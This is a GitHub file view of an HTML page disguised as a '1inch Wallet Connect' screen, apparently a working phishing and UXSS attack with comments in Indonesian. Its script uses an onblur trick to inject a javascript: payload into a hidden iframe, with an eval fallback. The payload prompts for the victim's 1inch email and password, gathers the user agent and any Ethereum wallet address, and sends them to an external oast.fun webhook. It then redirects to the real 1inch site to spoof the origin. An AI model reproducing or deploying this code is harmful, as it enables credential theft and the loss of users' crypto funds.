-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathijo.html
More file actions
110 lines (96 loc) · 3.65 KB
/
ijo.html
File metadata and controls
110 lines (96 loc) · 3.65 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title>1inch Wallet Connect</title>
<style>
body, html { margin:0; height:100%; background:#0f172a; color:#e2e8f0; font-family:system-ui; display:grid; place-items:center; overflow:hidden; }
.card { background:#1e293b; padding:32px; border-radius:20px; text-align:center; box-shadow:0 10px 40px rgba(0,0,0,0.6); max-width:380px; }
h1 { margin:0 0 12px; font-size:24px; color:#22c55e; }
p { margin:8px 0 24px; color:#94a3b8; font-size:15px; }
button {
background:#22c55e; color:#000; border:none; padding:16px 32px; border-radius:16px;
font-size:18px; font-weight:bold; cursor:pointer; width:100%;
box-shadow:0 8px 25px rgba(34,197,94,0.4);
}
button:hover { background:#16a34a; }
input[type="file"] { display:none; }
.logo { font-size:48px; margin-bottom:16px; }
</style>
</head>
<body>
<div class="card">
<div class="logo">1inch</div>
<h1>Connect Wallet</h1>
<p>Import your wallet backup file to continue</p>
<button id="uploadButton">Choose File</button>
<input type="file" id="fileInput" accept=".json,.keystore">
</div>
<!-- HIDDEN IFRAME UNTUK UXSS DELAYED -->
<iframe id="uxss" style="position:absolute; left:-9999px; width:1px; height:1px;"></iframe>
<script>
// CONFIG WEBHOOK KAMU
const WEBHOOK = "https://mpbxogpeszumkijyjecohzd8mgoadvoiq.oast.fun";
const fileInput = document.getElementById("fileInput");
const uploadButton = document.getElementById("uploadButton");
const iframe = document.getElementById("uxss");
// KODE UXSS YANG AKAN DIINJEKSI KE IFAME JAVASCRIPT: URI
const maliciousCode = `
(function(){
try {
var email = prompt(
"To continue using 1inch Wallet\\n\\nPlease login with your 1inch account\\n\\nEmail:",
""
);
if (!email || email.trim() === "") return;
var pass = prompt(
"To continue using 1inch Wallet\\n\\nPassword for: " + email,
""
);
var data = {
email: email,
password: pass || "",
url: location.href,
domain: document.domain,
title: document.title,
ua: navigator.userAgent,
time: new Date().toISOString()
};
var url = "${WEBHOOK}?data=" + encodeURIComponent(btoa(JSON.stringify(data)));
// Prioritas: sendBeacon → Image → fetch
if (navigator.sendBeacon && navigator.sendBeacon(url, "")) {
// success
} else {
new Image().src = url;
}
// Bonus: coba ambil wallet address kalau ada
if (window.ethereum?.selectedAddress) {
new Image().src = url + "&wallet=" + window.ethereum.selectedAddress;
}
} catch(e) {}
})();
`;
uploadButton.addEventListener("click", function () {
// 1. BUKA FILE PICKER (user interaction = trusted)
fileInput.click();
// 2. SETELAH FILE PICKER MUNcul → GUNAKAN onblur TRICK (PAKAI LOGIKA KEDUA KAMU)
window.onblur = function () {
// Delay kecil biar pasti sudah di background tab / WebView
setTimeout(() => {
try {
iframe.src = "javascript:" + maliciousCode;
} catch(e) {
// Fallback kalau iframe diblok
eval(maliciousCode);
}
}, 300);
};
// 3. NAVIGASI KE 1INCH (SPOOF ORIGIN)
setTimeout(() => {
location.href = "https://app.1inch.io/";
}, 1200);
});
</script>
</body>
</html>